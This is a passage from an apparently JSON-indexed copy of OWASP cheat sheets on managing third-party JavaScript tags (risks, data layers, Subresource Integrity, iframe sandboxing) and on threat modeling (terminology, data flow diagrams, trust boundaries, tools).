"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html","title":"Third Party JavaScript Management Cheat Sheet","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Tags, aka marketing tags, analytics tags etc. are small bits of JavaScript on a web page. They can also be HTML image elements when JavaScript is disabled. The reason for them is to collect data on the web user actions and browsing context for use by the web page owner in marketing.

Third party vendor JavaScript tags (hereinafter, tags) can be divided into two types:

User interface tags have to execute on the client because they change the DOM; displaying a dialog or image or changing text etc.

Analytics tags send information back to a marketing information database; information like what user action was just taken, browser metadata, location information, page metadata etc. The rationale for analytics tags is to provide data from the user's browser DOM to the vendor for some form of marketing analysis. This data can be anything available in the DOM. The data is used for user navigation and clickstream analysis, identification of the user to determine further content to display etc., and various marketing analysis functions.

The term host refers to the original site the user goes to, such as a shopping or news site, that contains or retrieves and executes third party JavaScript tag for marketing analysis of the user actions.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#major-risks","title":"Major risks","text":"

The single greatest risk is a compromise of the third party JavaScript server, and the injection of malicious JavaScript into the original tag JavaScript. This has happened in 2018 and likely earlier.

The invocation of third-party JS code in a web application requires consideration for 3 risks in particular:

  1. The loss of control over changes to the client application,
  2. The execution of arbitrary code on client systems,
  3. The disclosure or leakage of sensitive information to 3rd parties.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-1-loss-of-control-over-changes-to-the-client-application","title":"Risk 1: Loss of control over changes to the client application","text":"

This risk arises from the fact that there is usually no guaranty that the code hosted at the third-party will remain the same as seen from the developers and testers: new features may be pushed in the third-party code at any time, thus potentially breaking the interface or data-flows and exposing the availability of your application to its users/customers.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent alterations by 3rd parties), sub-resource integrity (to enable browser-level interception) and secure transmission of the third-party code (to prevent modifications while in-transit). See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-2-execution-of-arbitrary-code-on-client-systems","title":"Risk 2: Execution of arbitrary code on client systems","text":"

This risk arises from the fact that third-party JavaScript code is rarely reviewed by the invoking party prior to its integration into a website/application. As the client reaches the hosting website/application, this third-party code gets executed, thus granting the third-party the exact same privileges that were granted to the user (similar to XSS attacks).

Any testing performed prior to entering production loses some of its validity, including AST testing (IAST, RAST, SAST, DAST, etc.).

While it is widely accepted that the probability of having rogue code intentionally injected by the third-party is low, there are still cases of malicious injections in third-party code after the organization's servers were compromised (ex: Yahoo, January 2014).

This risk should therefore still be evaluated, in particular when the third-party does not show any documentation that it is enforcing better security measures than the invoking organization itself, or at least equivalent. Another example is that the domain hosting the third-party JavaScript code expires because the company maintaining it is bankrupt or the developers have abandoned the project. A malicious actor can then re-register the domain and publish malicious code.

Typical defenses include, but are not restricted to:

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-3-disclosure-of-sensitive-information-to-3rd-parties","title":"Risk 3: Disclosure of sensitive information to 3rd parties","text":"

When a third-party script is invoked in a website/application, the browser directly contacts the third-party servers. By default, the request includes all regular HTTP headers. In addition to the originating IP address of the browser, the third-party also obtains other data such as the referrer (in non-https requests) and any cookies previously set by the 3rd party, for example when visiting another organization's website that also invokes the third-party script.

In many cases, this grants the third-party primary access to information on the organization's users / customers / clients. Additionally, if the third-party is sharing the script with other entities, it also collects secondary data from all the other entities, thus knowing who the organization's visitors are but also what other organizations they interact with.

A typical case is the current situation with major news/press sites that invoke third-party code (typically for ad engines, statistics and JavaScript APIs): any user visiting any of these websites also informs the 3rd parties of the visit. In many cases, the third-party also gets to know what news articles each individual user is clicking specifically (leakage occurs through the HTTP referrer field) and thus can establish deeper personality profiles.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent leakage of HTTP requests to 3rd parties). Users can reduce their profiling by random clicking links on leaking websites/applications (such as press/news websites) to reduce profiling. See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#third-party-javascript-deployment-architectures","title":"Third-party JavaScript Deployment Architectures","text":"

There are three basic deployment mechanisms for tags. These mechanisms can be combined with each other.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-javascript-on-page","title":"Vendor JavaScript on page","text":"

This is where the vendor provides the host with the JavaScript and the host puts it on the host page. To be secure the host company must review the code for any vulnerabilities like XSS attacks or malicious actions such as sending sensitive data from the DOM to a malicious site. This is often difficult because the JavaScript is commonly obfuscated.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n<html>\n<head></head>\n    <body>\n        ...\n        <script\u00a0type=\"text/javascript\">/*\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0here\u00a0*/</script>\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#javascript-request-to-vendor","title":"JavaScript Request to Vendor","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL directly from the vendor site. When the host page is being created, the developer includes the lines of code provided by the vendor that will request the vendor JavaScript. Each time the page is accessed the requests are made to the vendor site for the javascript, which then executes on the user browser.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->`\n<html>\n    <head></head>\n    <body>\n        ...\n        <!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n        <script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n        <!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-request-to-vendor-through-tag-manager","title":"Indirect request to Vendor through Tag Manager","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL from a tag aggregator or tag manager site; not from the JavaScript vendor site. The tag aggregator or tag manager site returns whatever third party JavaScript files that the host company has configured to be returned. Each file or URL request to the tag manager site can return lots of other JavaScript files from multiple vendors.

The actual content that is returned from the aggregator or manager (i.e. the specific JavaScript files as well as exactly what they do) can be dynamically changed by host site employees using a graphical user interface for development, hosted on the tag manager site that non-technical users can work with, such as the marketing part of the business.

The changes can be either:

  1. Get a different JavaScript file from the third-party vendor for the same request.
  2. Change what DOM object data is read, and when, to send to the vendor.

The tag manager developer user interface will generate code that does what the marketing functionality requires, basically determining what data to get from the browser DOM and when to get it. The tag manager always returns a container JavaScript file to the browser which is basically a set of JavaScript functions that are used by the code generated by the user interface to implement the required functionality.

Similar to java frameworks that provide functions and global data to the developer, the container JavaScript executes on the browser and lets the business user use the tag manager developer user interface to specify high level functionality without needing to know JavaScript.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Tag\u00a0Manager\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>(function(w,\u00a0d,\u00a0s,\u00a0l,\u00a0i){\nw[l]\u00a0=\u00a0w[l]\u00a0||\u00a0[];\nw[l].push({'tm.start':new\u00a0Date().getTime(),\u00a0event:'tm.js'});\nvar\u00a0f\u00a0=\u00a0d.getElementsByTagName(s)[0],\nj\u00a0=\u00a0d.createElement(s),\ndl\u00a0=\u00a0l\u00a0!=\u00a0'dataLayer'\u00a0?\u00a0'&l='\u00a0+\u00a0l\u00a0:\u00a0'';\nj.async=true;\nj.src='https://tagmanager.com/tm.js?id='\u00a0+\u00a0i\u00a0+\u00a0dl;\nf.parentNode.insertBefore(j,\u00a0f);\n})(window,\u00a0document,\u00a0'script',\u00a0'dataLayer',\u00a0'TM-FOOBARID');</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/Tag\u00a0Manager\u00a0-->\n\u00a0\u00a0\u00a0</body>\n</html>`\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-problems-with-requesting-tags","title":"Security Problems with requesting Tags","text":"

The previously described mechanisms are difficult to make secure because you can only see the code if you proxy the requests or if you get access to the GUI and see what is configured. The JavaScript is generally obfuscated so even seeing it is usually not useful. It is also instantly deployable because each new page request from a browser executes the requests to the aggregator which gets the JavaScript from the third party vendor. So as soon as any JavaScript files are changed on the vendor, or modified on the aggregator, the next call for them from any browser will get the changed JavaScript. One way to manage this risk is with the Subresource Integrity standard described below.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer","title":"Server Direct Data Layer","text":"

The tag manager developer user interface can be used to create JavaScript that can get data from anywhere in the browser DOM and store it anywhere on the page. This can allow vulnerabilities because the interface can be used to generate code to get unvalidated data from the DOM (e.g. URL parameters) and store it in some page location that would execute JavaScript.

The best way to make the generated code secure is to confine it to getting DOM data from a host defined data layer.

The data layer is either:

  1. a DIV object with attribute values that have the marketing or user behavior data that the third-party wants
  2. a set of JSON objects with the same data. Each variable or attribute contains the value of some DOM element or the description of a user action. The data layer is the complete set of values that all vendors need for that page. The data layer is created by the host developers.

When specific events happen that the business has defined, a JavaScript handler for that event sends values from the data layer directly to the tag manager server. The tag manager server then sends the data to whatever third party or parties is supposed to get it. The event handler code is created by the host developers using the tag manager developer user interface. The event handler code is loaded from the tag manager servers on every page load.

This is a secure technique because only your JavaScript executes on your users browser, and only the data you decide on is sent to the vendor.

This requires cooperation between the host, the aggregator or tag manager and the vendors.

The host developers have to work with the vendor in order to know what type of data the vendor needs to do their analysis. Then the host programmer determines what DOM element will have that data.

The host developers have to work with the tag manager or aggregator to agree on the protocol to send the data to the aggregator: what URL, parameters, format etc.

The tag manager or aggregator has to work with the vendor to agree on the protocol to send the data to the vendor: what URL, parameters, format etc. Does the vendor have an API?

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-defense-considerations","title":"Security Defense Considerations","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer_1","title":"Server Direct Data Layer","text":"

The server direct mechanism is a good security standard for third party JavaScript management, deployment and execution. A good practice for the host page is to create a data layer of DOM objects.

The data layer can perform any validation of the values, especially values from DOM objects exposed to the user like URL parameters and input fields, if these are required for the marketing analysis.

An example statement for a corporate standard document is 'The tag JavaScript can only access values in the host data layer. The tag JavaScript can never access a URL parameter.

You the host page developer have to agree with the third-party vendors or the tag manager what attribute in the data layer will have what value so they can create the JavaScript to read that value.

User interface tags cannot be made secure using the data layer architecture because their function (or one of their functions) is to change the user interface on the client, not to send data about the user actions.

Analytics tags can be made secure using the data layer architecture because the only action needed is to send data from the data layer to the third party. Only first party code is executed; first to populate the data layer (generally on page load); then event handler JavaScript sends whatever data is needed from that page to the third party database or tag manager.

This is also a very scalable solution. Large ecommerce sites can easily have hundreds of thousands of URL and parameter combinations, with different sets of URLs and parameters being included in different marketing analysis campaigns. The marketing logic could have 30 or 40 different vendor tags on a single page.

For example user actions in pages about specified cities, from specified locations on specified days should send data layer elements 1, 2 and 3. User actions in pages about other cities should send data layer elements 2 and 3 only. Since the event handler code to send data layer data on each page is controlled by the host developers or marketing technologists using the tag manager developer interface, the business logic about when and what data layer elements are sent to the tag manager server, can be changed and deployed in minutes. No interaction is needed with the third parties; they continue getting the data they expect but now it comes from different contexts that the host marketing technologists have chosen.

Changing third party vendors just means changing the data dissemination rules at the tag manager server, no changes are needed in the host code. The data also goes directly only to the tag manager so the execution is fast. The event handler JavaScript does not have to connect to multiple third party sites.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-requests","title":"Indirect Requests","text":"

For indirect requests to tag manager/aggregator sites that offer the GUI to configure the javascript, they may also implement:

The host company should also verify the security practices of the tag manager site such as access controls to the tag configuration for the host company. It also can be two-factor authentication.

Letting the marketing folks decide where to get the data they want can result in XSS because they may get it from a URL parameter and put it into a variable that is in a scriptable location on the page.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-content","title":"Sandboxing Content","text":"

Both of these tools be used by sites to sandbox/clean DOM data.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#subresource-integrity","title":"Subresource Integrity","text":"

Subresource Integrity will ensure that only the code that has been reviewed is executed. The developer generates integrity metadata for the vendor javascript, and adds it to the script element like this:

<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"\nintegrity=\"sha384-MBO5IDfYaE6c6Aao94oZrIOiC7CGiSNE64QUbHNPhzk8Xhm0djE6QqTpL0HzTUxk\"\ncrossorigin=\"anonymous\">\n</script>\n

It is important to know that in order for SRI to work, the vendor host needs CORS enabled. Also it is good idea to monitor vendor JavaScript for changes in regular way. Because sometimes you can get secure but not working third-party code when the vendor decides to update it.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#keeping-javascript-libraries-updated","title":"Keeping JavaScript libraries updated","text":"

OWASP Top 10 2013 A9 describes the problem of using components with known vulnerabilities. This includes JavaScript libraries. JavaScript libraries must be kept up to date, as previous version can have known vulnerabilities which can lead to the site typically being vulnerable to Cross Site Scripting. There are several tools out there that can help identify such libraries. One such tool is the free open source tool RetireJS

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#sandboxing-with-iframe","title":"Sandboxing with iframe","text":"

You can also put vendor JavaScript into an iframe from different domain (e.g. static data host). It will work as a \"jail\" and vendor JavaScript will not have direct access to the host page DOM and cookies.

The host main page and sandbox iframe can communicate between each other via the postMessage mechanism.

Also, iframes can be secured with the iframe sandbox attribute.

For high risk applications, consider the use of Content Security Policy (CSP) in addition to iframe sandboxing. CSP makes hardening against XSS even stronger.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0somehost.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Include\u00a0iframe\u00a0with\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<iframe\n       src=\"https://somehost-static.net/analytics.html\"\n       sandbox=\"allow-same-origin\u00a0allow-scripts\">\n       </iframe>\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n\n<!--\u00a0somehost-static.net/analytics.html\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>\nwindow.addEventListener(\"message\",\u00a0receiveMessage,\u00a0false);\nfunction\u00a0receiveMessage(event)\u00a0{\nif\u00a0(event.origin\u00a0!==\u00a0\"https://somehost.com:443\")\u00a0{\nreturn;\n}\u00a0else\u00a0{\n//\u00a0Make\u00a0some\u00a0DOM\u00a0here\u00a0and\u00a0initialize\u00a0other\n//data\u00a0required\u00a0for\u00a03rd\u00a0party\u00a0code\n}\n}\n</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n\u00a0\u00a0\u00a0</body>\n\u00a0</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#virtual-iframe-containment","title":"Virtual iframe Containment","text":"

This technique creates iFrames that run asynchronously in relation to the main page. It also provides its own containment JavaScript that automates the dynamic implementation of the protected iFrames based on the marketing tag requirements.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-agreements","title":"Vendor Agreements","text":"

You can have the agreement or request for proposal with the 3rd parties require evidence that they have implemented secure coding and general corporate server access security. But in particular you need to determine the monitoring and control of their source code in order to prevent and detect malicious changes to that JavaScript.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#martechsec","title":"MarTechSec","text":"

Marketing Technology Security

This refers to all aspects of reducing the risk from marketing JavaScript. Controls include

  1. Contractual controls for risk reduction; the contracts with any MarTech company should include a requirement to show evidence of code security and code integrity monitoring.
  2. Contractual controls for risk transference: the contracts with any MarTech company could include a penalty for serving malicious JavaScript
  3. Technical controls for malicious JavaScript execution prevention; Virtual Iframes,
  4. Technical controls for malicious JavaScript identification; Subresource Integrity.
  5. Technical controls including client side JavaScript malicious behavior in penetration testing requirements.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#marsecops","title":"MarSecOps","text":"

Marketing Security Operations

This refers to the operational requirements to maintain some of the technical controls. This involves possible cooperation and information exchange between the marketing team, the martech provider and the run or operations team to update the information in the page controls (SRI hash change, changes in pages with SRI), the policies in the Virtual iFrames, tag manager configuration, data layer changes etc.

The most complete and preventive controls for any site containing non-trivial marketing tags are -

  1. A data layer that calls the marketing server or tag manager APIs , so that only your code executes on your page (inversion of control).

  2. Subresource Integrity.

  3. Virtual frame Containment.

The MarSecOps requirements to implement technical controls at the speed of change that marketing wants or without a significant number of dedicated resources, can make data layer and Subresource Integrity controls impractical.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html","title":"Threat Modeling Cheat Sheet","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Threat modeling is a structured approach of identifying and prioritizing potential threats to a system, and determining the value that potential mitigations would have in reducing or neutralizing those threats. This cheat sheet aims to provide guidance on how to create threat models for both existing systems or applications as well as new systems.

You do not need to be a security expert in order to implement the techniques covered in this cheat sheet. All developers, software and system designers, and architects should strive to include threat modeling in their software development life cycle. Optimally, you will create your threat models and determine which mitigations are needed during an early stage of the development of a new system, application, or feature. Assessing potential threats during the design phase of your project can save significant resources that might be needed to refactor the project to include risk mitigations during a later phase of the project.

When you produce a threat model, you will:

Note that throughout the document, the terms \"systems\" and \"applications\" are used interchangeably. The principles in the document apply equally to designing and building systems such as network infrastructures or server clusters as they do to designing or developing desktop, mobile, or web applications.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#threat-modeling-terminology","title":"Threat Modeling Terminology","text":"

You should be familiar with the following terms that will be used throughout this cheat sheet.

A threat agent is an individual or group that is capable of carrying out a particular threat. It is fundamental to identify who would want to exploit the assets of a company, how they might use them against the company, and if they would be capable of doing so. Some threats require more expertise or resources, and thus raise the level of threat actor needed. For example, if a threat requires hundreds of thousands of dollars of computing power to implement, it is likely that only organized corporate, criminal, or government actors would be valid threat actors for such a threat. However, with the rise of cloud computing and the prevalence of attack software on the internet, other threats may be easy to implement with relatively little skill and few resources.

Impact is a measure of the potential damage caused by a particular threat. Impact and damage can take a variety of forms. A threat may result in damage to physical assets, or may result in obvious financial loss. Indirect loss may also result from an attack, and needs to be considered as part of the impact. For example, if your company's website were defaced this could cause damage to your company's reputation, which may in turn cause a loss of business because of the loss of confidence by your users. Depending on the business you are in, attacks that expose user information could potentially result in a physical threat of harm or loss of life to your users, greatly raising the impact of threats that would allow such exposure.

Likelihood is a measure of the possibility of a threat being carried out. A variety of factors can impact the likelihood of a threat being carried out, including how difficult the implementation of the threat is, and how rewarding it would be to the attacker. For example, if a threat required a skilled threat actor with tens of thousands of dollars of computing resources to implement, and the only reward was that they were able to gain access to information that is already public in some other form, the likelihood is low. However, if the threat is relatively easy to accomplish, or if the attacker were to gain valuable information from which they could profit, the likelihood may be higher.

Controls are safeguards or countermeasures that you put in place in order to avoid, detect, counteract, or minimize potential threats against your information, systems, or other assets.

Preventions are controls that may completely prevent a particular attack from being possible. For example, if you identify a threat that your users' personal information may be identified by certain application logging, and you decide to completely remove that logging, you have prevented that particular threat.

Mitigations are controls that are put in place to reduce either the likelihood or the impact of a threat, while not necessarily completely preventing it. For example, if you store your user's passwords as hashes in a database, two users who have the same password will have the same hash. Thus, if an attacker has access to the hashed passwords and is able to determine the password associated with one hash, he is easily able to find all the other users who share the same password simply by looking for the same hash. However, if you add salts to each user's password, the cost of this particular attack is greatly increased, as the attacker must crack each password individual. An increase in cost reduces the likelihood, and thus has mitigated the attack.

A data flow diagram is a depiction of how information flows through your system. It shows each place that data is input into or output from each process or subsystem. It includes anywhere that data is stored in the system, either temporarily or long-term.

A trust boundary (in the context of threat modeling) is a location on the data flow diagram where data changes its level of trust. Any place where data is passed between two processes is typically a trust boundary. If your application reads a file from disk, there's a trust boundary between the application and the file because outside processes and users can modify the data in the file. If your application makes a call to a remote process, or a remote process makes calls to your application, that's a trust boundary. If you read data from a database, there's typically a trust boundary because other processes can modify the data in the database. Any place you accept user input in any form is always a trust boundary.

In addition to the above terminologies, it is important to be familiar with the key threat modeling principles defined in the Threat Modeling Manifesto project. Those principles are considered throughout the following steps in this cheat sheet.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#getting-started","title":"Getting Started","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-business-objectives","title":"Define Business Objectives","text":"

Before starting the threat modeling process it is important to identify business objectives of the applications you are assessing, and to identify security and compliance requirements that may be necessary due to business or government regulation. Having these objectives and requirements in mind before the threat assessment begins will help you to evaluate the impact of any threat you find during the risk analysis process.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-application-design","title":"Identify application design","text":"

Early in the threat modeling process, you will need to draw a data flow diagram of the entire system that is being assessed, including its trust boundaries. Thus, understanding the design of the application is key to performing threat modeling. Even if you are very familiar with the application design, you may identify additional data flows and trust boundaries throughout the threat modeling process.

A thorough understanding of how the system is designed will also help you assess the likelihood and potential impact of any particular threat that you identify.

When you are assessing an existing system that has existing design documentation, spend time reviewing that documentation. The documentation may be out of date, requiring you to gather new information to update the documentation. Or, there may be not documentation at all, requiring you to create the design documents.

In the optimal case, you are performing your assessment during the design phase of the project, and the design documentation will be up-to-date and available. In any event, this cheat sheet outlines steps you can take to create design documents if they are needed.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-design-documents","title":"Create design documents","text":"

There are many ways to generate design documents; the 4+1 view model is one of the matured approaches to building your design document.

Reference to 4+1 view model of architecture here.

Please note that the 4+1 is comprehensive, you may use any other design model during this phase.

The following subsections show the details about 4+1 approach and how this could help in the threat modeling process:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#logical-view","title":"Logical View","text":"

Create a logical map of the Target of Evaluation.

Audience: Designers.

Area: Functional Requirements: describes the design's object model.

Related Artifacts: Design model

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#implementation-view","title":"Implementation View","text":"

Audience: Programmers.

Area: Software components: describes the layers and subsystems of the application.

Related Artifacts: Implementation model, components

Please refer to the image in the appendix section for sample design for the implementation view.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#process-view","title":"Process View","text":"

Audience: Integrators.

Area: Non-functional requirements: describes the design's concurrency and synchronization aspects.

Related Artifacts: (no specific artifact).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#deployment-view","title":"Deployment View","text":"

Create a physical map of the Target of Evaluation

Audience: Deployment managers.

Area: Topology: describes the mapping of the software onto the hardware and shows the system's distributed aspects.

Related Artifacts: Deployment model.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-case-view","title":"Use-Case View","text":"

Audience: All the stakeholders of the system, including the end users.

Area: describes the set of scenarios and/or use cases that represent some significant, central functionality of the system.

Related Artifacts: Use-Case Model, Use-Case documents

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#decompose-and-model-the-system","title":"Decompose and Model the System","text":"

Gain an understanding of how the system works to perform a threat model, it is important to understand how the system works and interacts with its ecosystem. To start with creating a high-level information flow diagram, like the following:

  1. Identify the trusted boundaries of your system/application/module/ecosystem that you may want to start off with.
  2. Add actors \u2013 internal and external
  3. Define internal trusted boundaries. These can be the different security zones that have been designed
  4. Relook at the actors you have identified in #2 for consistency
  5. Add information flows
  6. Identify the information elements and their classification as per your information classification policy
  7. Where possible add assets to the identified information flows.
"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-and-evaluate-your-assets","title":"Define and Evaluate your Assets","text":"

Assets involved in the information flow should be defined and evaluated according to their value of confidentiality, integrity and availability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#consider-data-in-transit-and-data-at-rest","title":"Consider Data in transit and Data at rest","text":"

Data protection in transit is the protection of this data while it\u2019s travelling from network to network or being transferred from a local storage device to a cloud storage device \u2013 wherever data is moving, effective data protection measures for in-transit data are critical as data is often considered less secure while in motion.

While data at rest is sometimes considered to be less vulnerable than data in transit, attackers often find data at rest a more valuable target than data in motion.

The risk profile for data in transit or data at rest depends on the security measures that are in place to secure data in either state. Protecting sensitive data both in transit and at rest is imperative for modern enterprises as attackers find increasingly innovative ways to compromise systems and steal data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#create-an-information-flow-diagram","title":"Create an information flow diagram","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#whiteboard-your-architecture","title":"Whiteboard Your Architecture","text":"

It is important to whiteboard system architecture by showing the major constraints and decisions in order to frame and start conversations. The value is actually twofold. If the architecture cannot be white-boarded, then it suggests that it is not well understood. If a clear and concise whiteboard diagram can be provided, others will understand it and it will be easier to communicate details.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#manage-to-present-your-dfd-in-the-context-of-mvc","title":"Manage to present your DFD in the context of MVC","text":"

In this step, Data Flow Diagram should be divided in the context of Model, View, Controller (MVC).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#use-tools-to-draw-your-diagram","title":"Use tools to draw your diagram","text":"

If you don\u2019t like to manually draw your DFD; there are several tools available that could be used:

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-threat-dragon","title":"OWASP Threat Dragon","text":"

The OWASP Threat Dragon project is a cross platform tool that runs on Linux, macOS and Windows 10. Threat Dragon (TD) is used to create threat model diagrams and to record possible threats and decide on their mitigations using STRIDE methodology. TD is both a web application and a desktop application; refer to the project's GitHub repository for the latest release.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#poirot","title":"Poirot","text":"

The Poirot tool isolates and diagnoses defects through fault modeling and simulation. Along with a carefully selected partitioning strategy, functional and sequential test pattern applications show success with circuits having a high degree of observability.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#ms-tmt","title":"MS TMT","text":"

The Microsoft Threat Modeling Tool (TMT) helps find threats in the design phase of software projects. It is one of the longest lived threat modeling tools, having been introduced as Microsoft SDL in 2008, and is actively supported; version 7.3 was released March 2020. It runs only on Windows 10 Anniversary Update or later, and so is difficult to use on macOS or Linux.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#owasp-pytm","title":"OWASP pytm","text":"

Pytm is a Python library to help you describe your system in terms of objects and attributes, able to generate a DFD in Graphviz (dot) format, a sequence diagram in plantuml format, and a list of threats (out of CAPEC and other threat libraries) to the system in a templated format. As of 2023 it is under active development. No Python knowledge is necessary for its use - if you can define objects and use .attribute notation, you should be able to use it.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-data-flow-over-your-dfd","title":"Define Data Flow over your DFD","text":"

Define Data Flows over the organization Data Flow Diagram.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-trust-boundaries","title":"Define Trust Boundaries","text":"

Define any distinct boundaries (External boundaries and Internal boundaries) within which a system trusts all sub-systems (including data).

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-applications-user-roles-and-trust-levels","title":"Define applications user roles and trust levels","text":"

Define access rights that the application will grant to external entities and internal entities.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#highlight-authorization-per-user-role-over-the-dfd","title":"Highlight Authorization per user role over the DFD","text":"

Highlight Authorization per user role, for example, defining app users\u2019 role, admins\u2019 role, anonymous visitors\u2019 role...etc.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-application-entry-points","title":"Define Application Entry points","text":"

Define the interfaces through which potential attackers can interact with the application or supply them with data.

"},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#identify-threat-agents","title":"Identify Threat Agents","text":""},{"location":"cheatsheets/Threat_Modeling_Cheat_Sheet.html#define-all-possible-threats","title":"Define all possible threats","text":"

Identify Possible Attackers threat agents that could exist within the Target of Evaluation. Use Means, Motive, and Opportunities to understand Threats posed by Attackers. Then associate threat agents with system components they can directly interact with.

Work on minimizing the number of threat agents by:

The user of this cheat can depend on the following list of risks and threat libraries sources to define the possible threats an application might be facing:

  1. Risks with OWASP Top 10.
  2. Testing Procedure with OWASP ASVS.
